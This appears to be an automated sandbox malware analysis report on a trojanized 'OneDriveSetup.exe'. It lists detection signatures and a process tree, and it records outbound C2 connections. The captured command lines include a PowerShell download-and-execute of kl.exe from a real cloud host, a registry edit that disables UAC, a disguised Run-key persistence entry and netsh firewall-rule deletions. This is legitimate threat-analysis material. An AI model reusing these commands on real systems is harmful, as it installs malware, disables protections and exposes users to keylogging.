Windows Analysis Report
OneDriveSetup.exe

Overview

General Information

Sample name: OneDriveSetup.exe
Analysis ID: 1664120
MD5: a660caaf7011a3ad1c057f43d481a4d9
SHA1: ec04c2059e2ae95204a168238a786a97b27acd12
SHA256: 2d5d5d3b215efb94e74aa3f719e35f75d41f52b725bc06ea89ee8c5d1910570b
Tags: exe, user-smica83
Infos:

Detection

Score: 82
Range: 0 - 100
Confidence: 100%

Signatures

Detected unpacking (creates a PE file in dynamic memory)
Multi AV Scanner detection for submitted file
Yara detected Powershell download and execute
Bypasses PowerShell execution policy
Changes security center settings (notifications, updates, antivirus, firewall)
Contains functionality to inject code into remote processes
Creates multiple autostart registry keys
Disables UAC (registry)
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Modifies the DNS server
Modifies the windows firewall
Performs a network lookup / discovery via ARP
Powershell drops PE file
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Sample is not signed and drops a device driver
Sigma detected: Execution from Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: PowerShell DownloadFile
Sigma detected: Suspicious Program Location with Network Connections
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Uses cmd line tools excessively to alter registry or file data
Uses ipconfig to lookup or modify the Windows network settings
Uses netsh to modify the Windows network and firewall settings
AV process strings found (often used to terminate AV products)
Adds / modifies Windows certificates
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapter information
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates files inside the driver directory
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops certificate files (DER)
Enables debug privileges
Enables driver privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Communication To Uncommon Destination Ports
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Tap Installer Execution
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores files to the Windows start menu directory
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Yara detected Keylogger Generic

Classification

  • System is w10x64
  • OneDriveSetup.exe (PID: 7736 cmdline: "C:\Users\user\Desktop\OneDriveSetup.exe" MD5: A660CAAF7011A3AD1C057F43D481A4D9)
    • cmd.exe (PID: 2920 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Videos\download_and_run.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 7656 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • powershell.exe (PID: 4496 cmdline: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://aa-1348336590.cos.ap-hongkong.myqcloud.com/kl.exe', 'C:\Users\Public\Videos\bin.exe')" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • bin.exe (PID: 736 cmdline: "C:\Users\Public\Videos\bin.exe" MD5: DBB5F3B1A28CCFADB2DA212BB0539F42)
        • powershell.exe (PID: 756 cmdline: powershell -inputformat none -ExecutionPolicy Bypass -File "C:\Program Files (x86)\letsvpn\AddWindowsSecurityExclusion.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 2768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tapinstall.exe (PID: 2576 cmdline: "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" findall tap0901 MD5: 1E3CF83B17891AEE98C3E30012F0B034)
          • conhost.exe (PID: 4008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tapinstall.exe (PID: 3792 cmdline: "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" install "C:\Program Files (x86)\letsvpn\driver\OemVista.inf" tap0901 MD5: 1E3CF83B17891AEE98C3E30012F0B034)
          • conhost.exe (PID: 528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tapinstall.exe (PID: 4920 cmdline: "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" findall tap0901 MD5: 1E3CF83B17891AEE98C3E30012F0B034)
          • conhost.exe (PID: 4836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 4732 cmdline: cmd /c netsh advfirewall firewall Delete rule name=lets MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • netsh.exe (PID: 6492 cmdline: netsh advfirewall firewall Delete rule name=lets MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
        • cmd.exe (PID: 5108 cmdline: cmd /c netsh advfirewall firewall Delete rule name=lets.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 4536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • netsh.exe (PID: 2928 cmdline: netsh advfirewall firewall Delete rule name=lets.exe MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
        • cmd.exe (PID: 7884 cmdline: cmd /c netsh advfirewall firewall Delete rule name=LetsPRO.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • netsh.exe (PID: 8152 cmdline: netsh advfirewall firewall Delete rule name=LetsPRO.exe MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
        • cmd.exe (PID: 3640 cmdline: cmd /c netsh advfirewall firewall Delete rule name=LetsPRO MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 5768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • netsh.exe (PID: 7332 cmdline: netsh advfirewall firewall Delete rule name=LetsPRO MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
        • cmd.exe (PID: 2344 cmdline: cmd /c netsh advfirewall firewall Delete rule name=LetsVPN MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 2964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • netsh.exe (PID: 1436 cmdline: netsh advfirewall firewall Delete rule name=LetsVPN MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
        • LetsPRO.exe (PID: 1696 cmdline: "C:\Program Files (x86)\letsvpn\LetsPRO.exe" checkNetFramework MD5: B364262CA78E5636DBA568EDC36B7636)
          • LetsPRO.exe (PID: 4688 cmdline: "C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exe" checkNetFramework MD5: 3C9BED8471BE62A072A6A289EBBA3E13)
        • LetsPRO.exe (PID: 3756 cmdline: "C:\Program Files (x86)\letsvpn\LetsPRO.exe" MD5: B364262CA78E5636DBA568EDC36B7636)
          • LetsPRO.exe (PID: 1304 cmdline: "C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exe" MD5: 3C9BED8471BE62A072A6A289EBBA3E13)
            • cmd.exe (PID: 6360 cmdline: "cmd.exe" /C ipconfig /all MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 6264 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • ipconfig.exe (PID: 6544 cmdline: ipconfig /all MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)
            • cmd.exe (PID: 7136 cmdline: "cmd.exe" /C route print MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 6456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • ROUTE.EXE (PID: 7520 cmdline: route print MD5: C563191ED28A926BCFDB1071374575F1)
            • cmd.exe (PID: 6968 cmdline: "cmd.exe" /C arp -a MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 7196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • ARP.EXE (PID: 7320 cmdline: arp -a MD5: 4D3943EDBC9C7E18DC3469A21B30B3CE)
    • cmd.exe (PID: 872 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Downloads\20250413054815\1.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • reg.exe (PID: 5428 cmdline: reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
    • reg.exe (PID: 7472 cmdline: "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v GoogleUpdata_Service /d "C:\programdata\lnk\dick.lnk" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • conhost.exe (PID: 7988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 7768 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 8016 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • SgrmBroker.exe (PID: 8052 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: 3BA1A18A0DC30A0545E7765CB97D8E63)
  • svchost.exe (PID: 8092 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • sppsvc.exe (PID: 8120 cmdline: C:\Windows\system32\sppsvc.exe MD5: 320823F03672CEB82CC3A169989ABD12)
  • svchost.exe (PID: 8172 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 7252 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • MpCmdRun.exe (PID: 2292 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: B3676839B2EE96983F9ED735CD044159)
      • conhost.exe (PID: 4284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • Agghosts.exe (PID: 5864 cmdline: "C:\Users\Public\Music\20250413054815\Agghosts.exe" MD5: 2A24DCD41BC3C5B5F7ECEDA525786578)
  • Agghosts.exe (PID: 2668 cmdline: "C:\Users\Public\Music\20250413054815\Agghosts.exe" MD5: 2A24DCD41BC3C5B5F7ECEDA525786578)
  • svchost.exe (PID: 4520 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • drvinst.exe (PID: 5028 cmdline: DrvInst.exe "4" "0" "C:\Users\user\AppData\Local\Temp\{8bbf3398-85b1-894f-af03-707e5cd577b1}\oemvista.inf" "9" "4d14a44ff" "0000000000000158" "WinSta0\Default" "0000000000000170" "208" "c:\program files (x86)\letsvpn\driver" MD5: 294990C88B9D1FE0A54A1FA8BF4324D9)
    • drvinst.exe (PID: 5000 cmdline: DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem4.inf" "oem4.inf:3beb73aff103cc24:tap0901.ndi:9.24.6.601:tap0901," "4d14a44ff" "0000000000000118" MD5: 294990C88B9D1FE0A54A1FA8BF4324D9)
  • svchost.exe (PID: 4972 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 6400 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s Netman MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 6608 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • WmiApSrv.exe (PID: 6760 cmdline: C:\Windows\system32\wbem\WmiApSrv.exe MD5: 9A48D32D7DBA794A40BF030DA500603B)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
C:\Users\Public\Videos\download_and_run.bat | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
C:\Program Files (x86)\letsvpn\app-3.12.2\libwin.dll | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |

Source | Rule | Description | Author | Strings
00000017.00000003.1653704947.0000000002822000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
Process Memory Space: OneDriveSetup.exe PID: 7736 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
Process Memory Space: bin.exe PID: 736 | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |

Source | Rule | Description | Author | Strings
59.2.LetsPRO.exe.68b70000.21.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |

Source | Rule | Description | Author | Strings
amsi64_4496.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |

                System Summary

                Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Public\Music\20250413054815\Agghosts.exe" , CommandLine: "C:\Users\Public\Music\20250413054815\Agghosts.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\Music\20250413054815\Agghosts.exe, NewProcessName: C:\Users\Public\Music\20250413054815\Agghosts.exe, OriginalFileName: C:\Users\Public\Music\20250413054815\Agghosts.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 7584, ProcessCommandLine: "C:\Users\Public\Music\20250413054815\Agghosts.exe" , ProcessId: 5864, ProcessName: Agghosts.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -inputformat none -ExecutionPolicy Bypass -File "C:\Program Files (x86)\letsvpn\AddWindowsSecurityExclusion.ps1" , CommandLine: powershell -inputformat none -ExecutionPolicy Bypass -File "C:\Program Files (x86)\letsvpn\AddWindowsSecurityExclusion.ps1" , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\Public\Videos\bin.exe", ParentImage: C:\Users\Public\Videos\bin.exe, ParentProcessId: 736, ParentProcessName: bin.exe, ProcessCommandLine: powershell -inputformat none -ExecutionPolicy Bypass -File "C:\Program Files (x86)\letsvpn\AddWindowsSecurityExclusion.ps1" , ProcessId: 756, ProcessName: powershell.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://aa-1348336590.cos.ap-hongkong.myqcloud.com/kl.exe', 'C:\Users\Public\Videos\bin.exe')", CommandLine: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://aa-1348336590.cos.ap-hongkong.myqcloud.com/kl.exe', 'C:\Users\Public\Videos\bin.exe')", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Videos\download_and_run.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2920, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://aa-1348336590.cos.ap-hongkong.myqcloud.com/kl.exe', 'C:\Users\Public\Videos\bin.exe')", ProcessId: 4496, ProcessName: powershell.exe
                Source: Network ConnectionAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 143.92.56.59, DestinationIsIpv6: false, DestinationPort: 6666, EventID: 3, Image: C:\Users\Public\Music\20250413054815\Agghosts.exe, Initiated: true, ProcessId: 5864, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49721
                Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4496, TargetFilename: C:\Users\Public\Videos\bin.exe
                Source: Process startedAuthor: frack113: Data: Command: powershell -inputformat none -ExecutionPolicy Bypass -File "C:\Program Files (x86)\letsvpn\AddWindowsSecurityExclusion.ps1" , CommandLine: powershell -inputformat none -ExecutionPolicy Bypass -File "C:\Program Files (x86)\letsvpn\AddWindowsSecurityExclusion.ps1" , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\Public\Videos\bin.exe", ParentImage: C:\Users\Public\Videos\bin.exe, ParentProcessId: 736, ParentProcessName: bin.exe, ProcessCommandLine: powershell -inputformat none -ExecutionPolicy Bypass -File "C:\Program Files (x86)\letsvpn\AddWindowsSecurityExclusion.ps1" , ProcessId: 756, ProcessName: powershell.exe
                Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 143.92.56.59, DestinationIsIpv6: false, DestinationPort: 8888, EventID: 3, Image: C:\Users\Public\Music\20250413054815\Agghosts.exe, Initiated: true, ProcessId: 5864, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\programdata\lnk\dick.lnk, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\reg.exe, ProcessId: 7472, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GoogleUpdata_Service
                Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v GoogleUpdata_Service /d "C:\programdata\lnk\dick.lnk" /f, CommandLine: "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v GoogleUpdata_Service /d "C:\programdata\lnk\dick.lnk" /f, CommandLine|base64offset|contains: i, Image: C:\Windows\System32\reg.exe, NewProcessName: C:\Windows\System32\reg.exe, OriginalFileName: C:\Windows\System32\reg.exe, ParentCommandLine: "C:\Users\user\Desktop\OneDriveSetup.exe", ParentImage: C:\Users\user\Desktop\OneDriveSetup.exe, ParentProcessId: 7736, ParentProcessName: OneDriveSetup.exe, ProcessCommandLine: "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v GoogleUpdata_Service /d "C:\programdata\lnk\dick.lnk" /f, ProcessId: 7472, ProcessName: reg.exe
                Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exe, ProcessId: 1304, TargetFilename: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2y1uyrfg.mab.ps1
                Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4496, TargetFilename: C:\Users\Public\Videos\bin.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v GoogleUpdata_Service /d "C:\programdata\lnk\dick.lnk" /f, CommandLine: "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v GoogleUpdata_Service /d "C:\programdata\lnk\dick.lnk" /f, CommandLine|base64offset|contains: i, Image: C:\Windows\System32\reg.exe, NewProcessName: C:\Windows\System32\reg.exe, OriginalFileName: C:\Windows\System32\reg.exe, ParentCommandLine: "C:\Users\user\Desktop\OneDriveSetup.exe", ParentImage: C:\Users\user\Desktop\OneDriveSetup.exe, ParentProcessId: 7736, ParentProcessName: OneDriveSetup.exe, ProcessCommandLine: "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v GoogleUpdata_Service /d "C:\programdata\lnk\dick.lnk" /f, ProcessId: 7472, ProcessName: reg.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://aa-1348336590.cos.ap-hongkong.myqcloud.com/kl.exe', 'C:\Users\Public\Videos\bin.exe')", CommandLine: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://aa-1348336590.cos.ap-hongkong.myqcloud.com/kl.exe', 'C:\Users\Public\Videos\bin.exe')", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Videos\download_and_run.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2920, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://aa-1348336590.cos.ap-hongkong.myqcloud.com/kl.exe', 'C:\Users\Public\Videos\bin.exe')", ProcessId: 4496, ProcessName: powershell.exe
                Source: Process startedAuthor: Daniil Yugoslavskiy, Ian Davis, oscd.community: Data: Command: "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" findall tap0901, CommandLine: "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" findall tap0901, CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe, NewProcessName: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe, OriginalFileName: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe, ParentCommandLine: "C:\Users\Public\Videos\bin.exe", ParentImage: C:\Users\Public\Videos\bin.exe, ParentProcessId: 736, ParentProcessName: bin.exe, ProcessCommandLine: "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" findall tap0901, ProcessId: 2576, ProcessName: tapinstall.exe
                Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://aa-1348336590.cos.ap-hongkong.myqcloud.com/kl.exe', 'C:\Users\Public\Videos\bin.exe')", CommandLine: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://aa-1348336590.cos.ap-hongkong.myqcloud.com/kl.exe', 'C:\Users\Public\Videos\bin.exe')", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Videos\download_and_run.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2920, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://aa-1348336590.cos.ap-hongkong.myqcloud.com/kl.exe', 'C:\Users\Public\Videos\bin.exe')", ProcessId: 4496, ProcessName: powershell.exe
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://aa-1348336590.cos.ap-hongkong.myqcloud.com/kl.exe', 'C:\Users\Public\Videos\bin.exe')", CommandLine: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://aa-1348336590.cos.ap-hongkong.myqcloud.com/kl.exe', 'C:\Users\Public\Videos\bin.exe')", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Videos\download_and_run.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2920, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://aa-1348336590.cos.ap-hongkong.myqcloud.com/kl.exe', 'C:\Users\Public\Videos\bin.exe')", ProcessId: 4496, ProcessName: powershell.exe
                Source: Process startedAuthor: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io': Data: Command: "cmd.exe" /C ipconfig /all, CommandLine: "cmd.exe" /C ipconfig /all, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exe" , ParentImage: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exe, ParentProcessId: 1304, ParentProcessName: LetsPRO.exe, ProcessCommandLine: "cmd.exe" /C ipconfig /all, ProcessId: 6360, ProcessName: cmd.exe
